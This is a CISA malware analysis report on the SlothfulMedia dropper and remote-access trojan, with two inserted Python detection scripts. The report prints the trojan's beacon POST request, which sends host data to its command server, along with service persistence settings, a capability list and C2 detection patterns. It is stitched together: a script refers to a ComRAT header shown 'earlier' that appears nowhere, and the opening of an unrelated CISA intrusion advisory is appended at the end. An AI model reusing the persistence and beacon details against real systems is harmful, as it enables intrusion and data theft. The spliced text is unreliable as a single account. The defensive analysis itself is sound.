This report is provided “as is” for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE–Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.

Summary

Description

This Malware Analysis Report (MAR) is the result of analytic efforts between the Cybersecurity and Infrastructure Security Agency (CISA) and the Cyber National Mission Force (CNMF). The malware variant, known as SlothfulMedia, has been used by a sophisticated cyber actor. CISA and CNMF are distributing this MAR to enable network defense and reduce exposure to malicious activity. This MAR includes suggested response actions and recommended mitigation techniques.

The sample is a dropper, which deploys two files when executed. The first is a remote access tool (RAT) named ‘mediaplayer.exe’, which is designed for command and control (C2) of victim computer systems. Analysis has determined that the RAT has the ability to terminate processes, run arbitrary commands, take screenshots, modify the registry, and modify files on victim machines. It appears to communicate with its C2 controller via Hypertext Transfer Protocol (HTTP) over Transmission Control Protocol (TCP).

The second file has a random five-character name and deletes the dropper once the RAT has persistence. Persistence is achieved through the creation of a service named “TaskFrame”, which ensures the RAT is loaded after a reboot.

Users or administrators should flag activity associated with the malware and report the activity to CISA or the FBI Cyber Watch (CyWatch), and give the activity the highest priority for enhanced mitigation. For more information on malicious cyber activity, please visit https[:]//www[.]us-cert.gov.

For a downloadable copy of IOCs, see MAR-10303705-1.v1.stix.

Submitted Files (1)

64d78eec46c9ddd4b9a366de62ba0f2813267dc4393bc79e4c9a51a9bb7e6273 (448838B2A60484EE78C2198F2C0C9C…)

Additional Files (2)

4186b5beb576aa611b84cbe95781c9dccca6762f260ac7a48f6727840fc057fa (wHPEO.exe)

927d945476191a3523884f4c0784fb71c16b7738bd7f2abd1e3a198af403f0ae (mediaplayer.exe)

Domains (1)

sdvro.net

Findings

64d78eec46c9ddd4b9a366de62ba0f2813267dc4393bc79e4c9a51a9bb7e6273

Tags

bot, dropper, information-stealer, keylogger, remote-access-trojan, trojan

Details
Name 448838B2A60484EE78C2198F2C0C9C85
Size 117760 bytes
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 448838b2a60484ee78c2198f2c0c9c85
SHA1 f2c43a01cabaa694228f5354ea8c6bcf3b7a49b3
SHA256 64d78eec46c9ddd4b9a366de62ba0f2813267dc4393bc79e4c9a51a9bb7e6273
SHA512 9e532af06e5f4764529211e8c5c749baa7b01c72f11b603218c3c08d70cf1e732f8d9d81ec257ca247aaa96d1502150a2f402b1b3914780b6344222b007dd53f
ssdeep 3072:PGA5q4Xmco7ciR7BiU+q+TESaiQ4RHpxJdW:O0qtUYBiU+qRiQy
Entropy 6.156007
Antivirus
BitDefender Dropped:Generic.Malware.Fdldg.B04B59A4
Comodo TrojWare.Win32.ButeRat.PP
Emsisoft Dropped:Generic.Malware.Fdldg.B04B59A4 (B)
Ikarus Trojan-PWS.Win32.Zbot
Lavasoft Dropped:Generic.Malware.Fdldg.B04B59A4
YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date 2019-04-29 10:19:52-04:00
Import Hash 3e935061f369e95ac9d62c7cbdf4acf1
PE Sections
MD5 Name Raw Size Entropy
502dceaf120f990b5118230438102568 header 1024 2.390635
1ec70611505f1cebfc859820b45b6cc3 .text 39424 6.506891
dfebe81d71d56100ac07b85046f07b77 .rdata 12288 4.988754
06f5259aac1a4462eaf12334dc0e8daf .data 59392 6.004077
c2d6c399730fd89b16d2b6d6cec5e393 .rsrc 512 5.105006
1587227ab56ecfb9c5b85aaf24d98454 .reloc 5120 3.993742
Packers/Compilers/Cryptors
Microsoft Visual C++ ?.?
Relationships
64d78eec46… Dropped 4186b5beb576aa611b84cbe95781c9dccca6762f260ac7a48f6727840fc057fa
64d78eec46… Connected_To sdvro.net
64d78eec46… Dropped 927d945476191a3523884f4c0784fb71c16b7738bd7f2abd1e3a198af403f0ae
Description

This file is a 32-bit Windows executable. When executed, it will drop a file called ‘mediaplayer.exe’ (927d945476191a3523884f4c0784fb71c16b7738bd7f2abd1e3a198af403f0ae) into the path %AppData%\Media. A link file called ‘media.lnk’ is also placed in this path. A third file is placed in the path %TEMP% and is given a five-character random name with an ‘.exe’ extension, e.g. ‘wHPEO.exe’ (4186b5beb576aa611b84cbe95781c9dccca6762f260ac7a48f6727840fc057fa). This file is created with a ‘hidden’ attribute to ensure that it is not visible to the user.

Next, the program will create a service on the system called “TaskFrame” with the following parameters:

— Begin Service Parameters —
HKLM\System\CurrentControlSet\Services\TaskFrame    Type: 272
HKLM\System\CurrentControlSet\Services\TaskFrame    Start: 2
HKLM\System\CurrentControlSet\Services\TaskFrame    ErrorControl: 1
HKLM\System\CurrentControlSet\Services\TaskFrame    ImagePath: C:\Users\<user>\AppData\Roaming\Media\mediaplayer.exe
HKLM\System\CurrentControlSet\Services\TaskFrame    DisplayName: TaskFrame
HKLM\System\CurrentControlSet\Services\TaskFrame    ObjectName: LocalSystem
— End Service Parameters —

This service is used to create persistence on the system: with Start set to 2 (SERVICE_AUTO_START), the ‘mediaplayer.exe’ (927d945476191a3523884f4c0784fb71c16b7738bd7f2abd1e3a198af403f0ae) program is started each time the system boots.

Next, the program will collect system information to send to the command and control (C2). A unique identifier is created and sent in a POST request along with a Unix timestamp of the time of infection to the domain www[.]sdvro.net. Connection attempts are made via both HTTP and HTTPS. The following is a sample of the POST request:

— Begin POST Request —
POST /v?m=u2fssrqh8cl0&i=1598908417 HTTP/1.1
Accept: application/octet-stream,application/xhtml
Content-Length: 436
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75
Host: www[.]sdvro.net
Connection: Keep-Alive
Cache-Control: no-cache

..D……!F.1y^.4.&….{ ..f]..Fz…;..H.L`p..$.H..0A.A(An_8…;..$yH.t..4H…3..K.QvRkX.c..|r r=..V.F…..Hc.H……H.<..tfH….@..uU.@…..uL..D.=o..l!’..D$hH.&.H.f..H.f(..F..n.H..H.$`H.l$pH..0A_A]A_^…H.$.H.t..gH…3..f..K..-.
..|    
=../.:…..Hc.H……H.<..tfH….@..uU.r.0.0.[L..t.
o..2!v..D
hy…p.f..H.f(..F..n.H..H.$`H.l$pH..0A_A]A_^…H.$.H.t$.WH..03..K..K(…3..|$ ;=……….Hc.H……H.:..tWH….@..uU.@…..uL..D.
— End POST Request —

The domain did not resolve to an IP address at the time of analysis. Note: The malware uses the fixed User-Agent string, “Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75” in its communication.
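The CONNECT header shown earlier for the ComRAT communication module and the POST beacon above both have fixed shapes that can be matched in proxy captures. The Python example below is added here and is not CISA's code; it serves both passages. The request texts are the ones printed in this report with the defanging brackets removed, the benign GET is constructed, and the beacon-id pattern is a heuristic taken from the single observed request.

```python
import re
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Indicators taken from this report: ComRAT v4 C2 domains and the fixed User-Agent strings.
COMRAT_C2 = {"bronerg.tk", "crusider.tk", "duke6.tk", "sanitar.ml", "wekanda.tk", "branter.tk"}
COMRAT_UA = ("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; "
             ".NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; "
             "Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)")
SLOTHFUL_HOSTS = {"sdvro.net", "www.sdvro.net"}
SLOTHFUL_UA = ("Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 "
               "(KHTML, like Gecko) Chrome/68.0.3440.75")
SLOTHFUL_ACCEPT = "application/octet-stream,application/xhtml"
# Beacon id shape is a heuristic from the one observed value (u2fssrqh8cl0).
SLOTHFUL_ID = re.compile(r"^[a-z0-9]{8,16}$")


def parse_request(raw: str):
    """Split a raw request head into (method, target, headers); header names lower-cased."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = [line for line in head.split("\n") if line.strip()]
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def request_host(target: str, headers: dict) -> str:
    """Host without port, from the Host header or, failing that, the CONNECT authority."""
    return (headers.get("host") or target).split(":")[0].lower()


def classify(raw: str) -> Optional[dict]:
    """Return family, host and the reasons matched, or None for an unrelated request."""
    method, target, headers = parse_request(raw)
    host = request_host(target, headers)
    ua = headers.get("user-agent", "")

    if method == "CONNECT" and host in COMRAT_C2:
        reasons = ["CONNECT to a ComRAT v4 C2 domain"]
        if ua == COMRAT_UA:
            reasons.append("fixed MSIE 7.0 User-Agent of the communication module")
        if "content-length" in headers:
            reasons.append("Content-Length on a CONNECT, which browsers normally omit")
        return {"family": "ComRAT v4", "host": host, "reasons": reasons}

    if method == "POST" and host in SLOTHFUL_HOSTS:
        parts = urlsplit(target)
        query = parse_qs(parts.query)
        beacon_id = query.get("m", [""])[0]
        stamp = query.get("i", [""])[0]
        if parts.path == "/v" and SLOTHFUL_ID.match(beacon_id) and stamp.isdigit():
            reasons = ["POST /v?m=<id>&i=<unix time> to the SlothfulMedia C2 domain"]
            if ua == SLOTHFUL_UA:
                reasons.append("fixed Chrome/68.0.3440.75 User-Agent")
            if headers.get("accept") == SLOTHFUL_ACCEPT:
                reasons.append("the dropper's fixed Accept header")
            return {"family": "SlothfulMedia", "host": host, "beacon_id": beacon_id,
                    "infection_time": int(stamp), "reasons": reasons}
    return None


# The two request heads printed in this report (bodies omitted) and a constructed benign
# GET that reuses the SlothfulMedia User-Agent to show the UA alone does not trigger.
COMRAT_REQUEST = (
    "CONNECT bronerg.tk:443 HTTP/1.0\r\nUser-Agent: " + COMRAT_UA + "\r\n"
    "Host: bronerg.tk:443\r\nContent-Length: 0\r\nConnection: Keep-Alive\r\n\r\n"
)
SLOTHFUL_REQUEST = (
    "POST /v?m=u2fssrqh8cl0&i=1598908417 HTTP/1.1\r\nAccept: " + SLOTHFUL_ACCEPT + "\r\n"
    "Content-Length: 436\r\nUser-Agent: " + SLOTHFUL_UA + "\r\nHost: www.sdvro.net\r\n"
    "Connection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
)
BENIGN_REQUEST = ("GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
                  "User-Agent: " + SLOTHFUL_UA + "\r\n\r\n")

if __name__ == "__main__":
    for sample in (COMRAT_REQUEST, SLOTHFUL_REQUEST, BENIGN_REQUEST):
        print(classify(sample))
```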

The following notable strings were found in unreferenced data within the file. The purpose of the strings could not be determined. The strings are not used by the code.

— Begin Notable Strings —
C:\Users\david\AppData\Roaming\Media\mediaplayer.exe
david-pc
— End Notable Strings —

sdvro.net

Tags

command-and-control

Ports
  • 80 TCP
  • 443 TCP
HTTP Sessions
  • POST /v?m=u2fssrqh8cl0&i=1598908417 HTTP/1.1
    Accept: application/octet-stream,application/xhtml
    Content-Length: 436
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75
    Host: www.sdvro.net
    Connection: Keep-Alive
    Cache-Control: no-cache

Whois

Domain Name: SDVRO.NET
Registry Domain ID: 2371496862_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.west263.com
Registrar URL: http://www.west.cn/
Updated Date: 2020-03-31T08:26:43Z
Creation Date: 2019-03-21T07:42:43Z
Registry Expiry Date: 2021-03-21T07:42:43Z
Registrar: Chengdu West Dimension Digital Technology Co., Ltd.
Registrar IANA ID: 1556
Registrar Abuse Contact Email:
Registrar Abuse Contact Phone:
Domain Status: ok https://icann.org/epp#ok
Name Server: NS3.MYHOSTADMIN.NET
Name Server: NS4.MYHOSTADMIN.NET
DNSSEC: unsigned

Domain Name: sdvro.net
Registry Domain ID: whois protect
Registrar WHOIS Server: whois.west.cn
Registrar URL: www.west.cn
Updated Date: 2019-03-21T07:42:42.0Z
Creation Date: 2019-03-21T07:42:42.0Z
Registrar Registration Expiration Date: 2021-03-21T07:42:42.0Z
Registrar: Chengdu west dimension digital technology Co., LTD
Registrar IANA ID: 1556
Reseller:
Domain Status: ok http://www.icann.org/epp#ok
Registry Registrant ID: Not Available From Registry
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: REDACTED FOR PRIVACY
Registrant Street: REDACTED FOR PRIVACY
Registrant City: Chengdu
Registrant State/Province: Sichuan
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: CN
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext:
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext:
Registrant Email: link at https://www.west.cn/web/whoisform?domain=sdvro.net
Registry Admin ID: Not Available From Registry
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: Chengdu
Admin State/Province: Sichuan
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: CN
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext:
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext:
Admin Email: link at https://www.west.cn/web/whoisform?domain=sdvro.net
Registry Tech ID: Not Available From Registry
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: Chengdu
Tech State/Province: Sichuan
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: CN
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext:
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext:
Tech Email: link at https://www.west.cn/web/whoisform?domain=sdvro.net
Name Server: ns3.myhostadmin.net
Name Server: ns4.myhostadmin.net
DNSSEC: signedDelegation

Relationships
sdvro.net Connected_From 64d78eec46c9ddd4b9a366de62ba0f2813267dc4393bc79e4c9a51a9bb7e6273
Description

This domain did not resolve to an IP address at the time of analysis.

927d945476191a3523884f4c0784fb71c16b7738bd7f2abd1e3a198af403f0ae

Tags

remote-access-trojan

Details
Name mediaplayer.exe
Size 46080 bytes
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 9f23bd89694b66d8a67bb18434da4ee8
SHA1 db8c6ea90b1be5aa560bfbe5a34577eb284243af
SHA256 927d945476191a3523884f4c0784fb71c16b7738bd7f2abd1e3a198af403f0ae
SHA512 72e95a90dc8ee2fd69b26665e88d19b1d36527fe8bbc03e252d4be925cf4acae20a3155dcd7caa50daf6e16d201a16822d77356c91654a6e4a05981425574c5b
ssdeep 768:NRw4PZcMc8ie9+dZL6DSKdzxSGyCevVcxjw3e3PxKfRXAxo3vhxfFORpa9sxw:NRwaBiU+dZODSKeGHSaxjw3QUfRH/hx7
Entropy 6.320571
Antivirus
BitDefender Gen:Variant.Fugrafa.6689
Emsisoft Gen:Variant.Fugrafa.6689 (B)
Lavasoft Gen:Variant.Fugrafa.6689
Symantec Heur.AdvML.B
YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date 2019-04-29 10:18:34-04:00
Import Hash db182005fc9fccab434ec0764ea5a244
Company Name Tdl Corporation
File Description Local Security Process
Internal Name None
Legal Copyright Copyright (C) 2018
Original Filename None
Product Name Tdl Corporation
Product Version 1.0.0.1
PE Sections
MD5 Name Raw Size Entropy
faf4cd402ffdb84551c382ea45f2f893 header 1024 2.514929
7e3095c827af75a349f3c206925932cd .text 31232 6.493665
614ccbacb5de6dae94b6af93aa5a83fc .rdata 8192 5.232371
543ffbd535401feb9f37c585d9f161f3 .data 1536 4.679413
7c1584feb039309d7a4307c39adaa54f .rsrc 1024 2.333786
79345fb74e56359cd6eb957ceb52e0ab .reloc 3072 4.519356
Packers/Compilers/Cryptors
Microsoft Visual C++ ?.?
Relationships
927d945476… Dropped_By 64d78eec46c9ddd4b9a366de62ba0f2813267dc4393bc79e4c9a51a9bb7e6273
Description

This file is a 32-bit Windows executable file that is dropped and executed by 448838B2A60484EE78C2198F2C0C9C85. The file is called ‘mediaplayer.exe’. When executed, it will look for a file called ‘Junk9’ and will attempt to delete it. The file ‘Junk9’ was not available for analysis. Next, it will take a screenshot of the user’s desktop, name it ‘Filter3.jpg’, and store it in the local directory. The program then looks for a service called ‘TaskFrame’ and attempts to start it. The ‘TaskFrame’ service is able to delete, add, or modify registry keys, and start and stop a keylogger program on the system. If the ‘TaskFrame’ service is already installed and running, the program will terminate.

The malware will create a mutex on the system called ‘Globalmukimukix’. The program changes the proxy configuration of the system with the following registry modifications:

— Begin Registry Modification —
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
   Name: ProxyBypass    Value: 1
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
   Name: IntranetName    Value: 1
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
   Name: UNCAsIntranet    Value: 1
— End Registry Modification —

The program collects the computer name, user name, OS version, adapter information, memory usage, and logical drives for the system. This information is concatenated into a string that is hashed and sent as part of the initial POST request to the C2. The program will expect to receive a ‘200 OK’ response from the C2 before it begins transmission. If it receives a ‘501 Error’ the program sleeps for three seconds and attempts another connection. If the initial connection to the C2 is successful, the program will await a command. The program is capable of executing the following tasks from commands issued by the C2:

— Begin Program Capabilities —

1. Create, Write, and Delete files.
2. Open a Command Line.
3. Move Files.
4. Enumerate Open Ports.
5. Enumerate Drives.
6. Enumerate Processes by ID, Name, or Privileges.
7. Start and Stop Processes.
8. Enumerate Files and Directories.
9. Open a Named Pipe and Send and Receive Data.
10. Take Screenshots.
11. Inject into User Processes.
12. Enumerate Services.
13. Start/Stop Services.
14. Modify the Registry.
15. Open/Close TCP and UDP Sessions.

— End Program Capabilities —

The program will also look for the following paths: SetupUi, AppIni, and ExtInfo. The purpose for this search could not be determined.

4186b5beb576aa611b84cbe95781c9dccca6762f260ac7a48f6727840fc057fa

Tags

remote-access-trojan

Details
Name wHPEO.exe
Size 7168 bytes
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 92a40c64cea4a87de1c24437612f2e0f
SHA1 f52f0685a72d6a8f3e119ce92b7cf1c2c6a83bb9
SHA256 4186b5beb576aa611b84cbe95781c9dccca6762f260ac7a48f6727840fc057fa
SHA512 d0714d09dcac070eb8d0971e953ce0c0382658d5682982a8045dcf29da9a729be57dc7d60c4e18f1833966f6c6584e9a883871eef8d1c9f9d3b5dd100c69b9a4
ssdeep 192:DcTrBTVdZzgW+mpWpc9aThFJJRmqSA9iu:c7EmpWpc9aThFVviu
Entropy 5.395407
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date 2017-12-04 08:14:24-05:00
Import Hash 6ab19ee53c87a04ccb965f5f658b717a
PE Sections
MD5 Name Raw Size Entropy
d6cd352d657372b25707fed98bc3bd0b header 1024 2.379332
c036d2e814490871e54dd84e8117e044 .text 2560 5.788179
2f2819452977bcfd6dcac4389a2cd193 .rdata 1536 4.849405
afadce14c7f045a0390158515331a054 .data 512 1.342806
554d0cedd69e96ee00c8324ce4da604c .rsrc 1024 5.194460
ed7fec6ad28b233df4676dad7f306c3c .reloc 512 4.741130
Packers/Compilers/Cryptors
Microsoft Visual C++ ?.?
Relationships
4186b5beb5… Dropped_By 64d78eec46c9ddd4b9a366de62ba0f2813267dc4393bc79e4c9a51a9bb7e6273
Description

This artifact is a 32-bit Windows executable that is dropped by 448838B2A60484EE78C2198F2C0C9C85. This program has some anti-forensic capability and is designed to clear indicators of compromise (IOCs) from the system. The program first verifies that the service ‘TaskFrame’ is running then adds the following key to the registry:

— Begin Registry Modification —
HKLM\System\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations
   Data: \??\C:\Users\<user>\AppData\Local\Temp\wHPEO.exe
— End Registry Modification —

This modification ensures that the file is deleted on the next system restart. The program will also delete the user’s ‘index.dat’ file, thus removing the user’s recent Internet history from the system.
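
The registry changes described for mediaplayer.exe (the three ZoneMap values) and wHPEO.exe (the PendingFileRenameOperations entry) are the host artifacts a defender can hunt for. The script below is an added example, not part of the CISA report or of the malware analysis: it runs the hunt over Sysmon-style registry value-set events (EventID 13). The record layout (tab-separated EventID, Image, TargetObject, Details), the sample events, the file paths and the SID are all constructed for the example and are not from the report.

```python
import re
from collections import defaultdict

# Registry locations taken from the report. Matching is case-insensitive and
# suffix-based so that HKCU, which Sysmon reports as HKU\<SID>, still matches.
ZONEMAP_KEY = "\\internet settings\\zonemap"
ZONEMAP_VALUES = {"proxybypass", "intranetname", "uncasintranet"}
PFRO_VALUE = "\\session manager\\pendingfilerenameoperations"
TEMP_PATH_RE = re.compile(r"\\appdata\\local\\temp\\", re.IGNORECASE)


def parse_event(line):
    """Split one constructed record: EventID, Image, TargetObject, Details (tab-separated)."""
    event_id, image, target, details = line.rstrip("\n").split("\t", 3)
    return {"event_id": int(event_id), "image": image, "target": target, "details": details}


def dword_value(details):
    """Sysmon renders DWORD data as 'DWORD (0x00000001)'; return the integer or None."""
    m = re.search(r"0x([0-9a-fA-F]{1,8})", details)
    return int(m.group(1), 16) if m else None


def classify(event):
    """Label one registry value-set event (Sysmon EventID 13), or return None."""
    if event["event_id"] != 13:
        return None
    target = event["target"].lower()
    key, _, value_name = target.rpartition("\\")
    if (key.endswith(ZONEMAP_KEY) and value_name in ZONEMAP_VALUES
            and dword_value(event["details"]) == 1):
        return "zonemap:" + value_name
    if target.endswith(PFRO_VALUE) and TEMP_PATH_RE.search(event["details"]):
        return "pending-delete-from-temp"
    return None


def hunt(lines):
    """Group findings by the process that wrote them and rate each group.

    All three ZoneMap values set to 1 by one process, or a PendingFileRenameOperations
    entry pointing into a user's Temp directory, is rated high. A single ZoneMap
    change is rated low: Group Policy and admin scripts legitimately set these values.
    """
    labels_by_image = defaultdict(set)
    for line in lines:
        event = parse_event(line)
        label = classify(event)
        if label:
            labels_by_image[event["image"]].add(label)
    report = {}
    for image, labels in labels_by_image.items():
        zonemap_hits = {lbl for lbl in labels if lbl.startswith("zonemap:")}
        high = "pending-delete-from-temp" in labels or len(zonemap_hits) == 3
        report[image] = ("high" if high else "low", sorted(labels))
    return report


# Constructed sample records (not real telemetry); paths and SID are made up.
ZONEMAP = r"HKU\S-1-5-21-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap"
PFRO = r"HKLM\System\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations"
MEDIAPLAYER = r"C:\Users\alice\Downloads\mediaplayer.exe"
WHPEO = r"C:\Users\alice\AppData\Local\Temp\wHPEO.exe"
GPSCRIPT = r"C:\Windows\System32\gpscript.exe"
SAMPLE_EVENTS = [
    "\t".join(["13", MEDIAPLAYER, ZONEMAP + r"\ProxyBypass", "DWORD (0x00000001)"]),
    "\t".join(["13", MEDIAPLAYER, ZONEMAP + r"\IntranetName", "DWORD (0x00000001)"]),
    "\t".join(["13", MEDIAPLAYER, ZONEMAP + r"\UNCAsIntranet", "DWORD (0x00000001)"]),
    "\t".join(["13", WHPEO, PFRO, r"\??\C:\Users\alice\AppData\Local\Temp\wHPEO.exe"]),
    "\t".join(["13", GPSCRIPT, ZONEMAP + r"\IntranetName", "DWORD (0x00000001)"]),  # lone GPO-style change
    "\t".join(["13", GPSCRIPT, ZONEMAP + r"\ProxyBypass", "DWORD (0x00000000)"]),   # value 0: not flagged
    "\t".join(["12", MEDIAPLAYER, ZONEMAP, "CreateKey"]),                              # key creation, not a value set
]

if __name__ == "__main__":
    for image, (severity, labels) in hunt(SAMPLE_EVENTS).items():
        print(f"{severity:4} {image}: {', '.join(labels)}")
```

The rating logic is the point: any one of the ZoneMap values is also written by Group Policy, so a single hit is noise, while all three from one non-system process, or a pending-delete of a Temp executable, matches the behaviour the report describes closely enough to open a case.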

Relationship Summary

64d78eec46… Dropped 4186b5beb576aa611b84cbe95781c9dccca6762f260ac7a48f6727840fc057fa
64d78eec46… Connected_To sdvro.net
64d78eec46… Dropped 927d945476191a3523884f4c0784fb71c16b7738bd7f2abd1e3a198af403f0ae
sdvro.net Connected_From 64d78eec46c9ddd4b9a366de62ba0f2813267dc4393bc79e4c9a51a9bb7e6273
927d945476… Dropped_By 64d78eec46c9ddd4b9a366de62ba0f2813267dc4393bc79e4c9a51a9bb7e6273
4186b5beb5… Dropped_By 64d78eec46c9ddd4b9a366de62ba0f2813267dc4393bc79e4c9a51a9bb7e6273

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization’s systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users’ ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
  • Monitor users’ web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, “Guide to Malware Incident Prevention & Handling for Desktops and Laptops”.

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://www.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA’s homepage at www.cisa.gov.

Revisions

  • October 1, 2020: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

Original release date: September 24, 2020

Summary

This Analysis Report uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the ATT&CK for Enterprise framework for all referenced threat actor tactics and techniques.

The Cybersecurity and Infrastructure Security Agency (CISA) responded to a recent threat actor’s cyberattack on a federal agency’s enterprise network. By leveraging compromised credentials, the cyber threat actor implanted sophisticated malware—including multi-stage malware that evaded the affected agency’s anti-malware protection—and gained persistent access through two reverse Socket Secure (SOCKS) proxies that exploited weaknesses in the agency’s firewall.

For a downloadable copy of IOCs, see: AA20-268A.stix.

Description

CISA became aware—via EINSTEIN, CISA’s intrusion detection system that monitors federal civilian networks—of a potential compromise of a federal agency’s network. In coordination with the affected agency, CISA conducted an incident response engagement, confirming malicious activity. The following information is derived exclusively from the incident response engagement and provides the threat actor’s tactics, techniques, and procedures as well as indicators of compromise that CISA observed as part of the engagement.

Threat Actor Activity

The cyber threat actor had valid access credentials for multiple users’ Microsoft Office 365 (O365) accounts and domain administrator accounts, which they leveraged for Initial Access [TA0001] to the agency’s network (Valid Accounts [T1078]). First the threat actor logged into a user’s O365 account from Internet Protocol (IP) address 91.219.236[.]166 and then browsed pages on a SharePoint site and downloaded a file (Data from Information Repositories: SharePoint [T1213.002]). The cyber threat actor connected multiple times by Transmission Control Protocol (TCP) from IP address 185.86.151[.]223 to the victim organization’s virtual private network (VPN) server (Exploit Public-Facing Application [T1190]).

CISA analysts were not able to determine how the cyber threat actor initially obtained the credentials. It is possible the cyber actor obtained the credentials from an unpatched agency VPN server by exploiting a known vulnerability—CVE-2019-11510—in Pulse Secure (Exploitation for Credential Access [T1212]). In April 2019, Pulse Secure released patches for several critical vulnerabilities—including CVE-2019-11510, which allows the remote, unauthenticated retrieval of files, including passwords.[1] CISA has observed wide exploitation of CVE-2019-11510 across the federal government.[2]

After initial access, the threat actor performed Discovery [TA0007] by logging into an agency O365 email account from 91.219.236[.]166 and viewing and downloading help desk email attachments with “Intranet access” and “VPN passwords” in the subject line, despite already having privileged access (Email Collection [T1114], Unsecured Credentials: Credentials In Files [T1552.001]). (Note: these emails did not contain any passwords.) The actor logged into the same email account via Remote Desktop Protocol (RDP) from IP address 207.220.1[.]3 (External Remote Services [T1133]). The actor enumerated the Active Directory and Group Policy key and changed a registry key for the Group Policy (Account Manipulation [T1098]). Immediately afterward, the threat actor used common Microsoft Windows command line processes—conhost, ipconfig, net, query, netstat, ping, whoami, and plink.exe—to enumerate the compromised system and network (Command and Scripting Interpreter [T1059], System Network Configuration Discovery [T1016]).

The cyber threat actor then attempted multiple times to connect to virtual private server (VPS) IP 185.86.151[.]223 through a Windows Server Message Block (SMB) client. Although they connected and disconnected multiple times, the connections were ultimately successful. During the same period, the actor used an alias secure identifier account they had previously created to log into VPS 185.86.151[.]223 via an SMB share. The attacker then executed plink.exe on a victim file server (Command and Scripting Interpreter [T1059]). (plink.exe is a command-line version of PuTTY that is used for remote administration.)

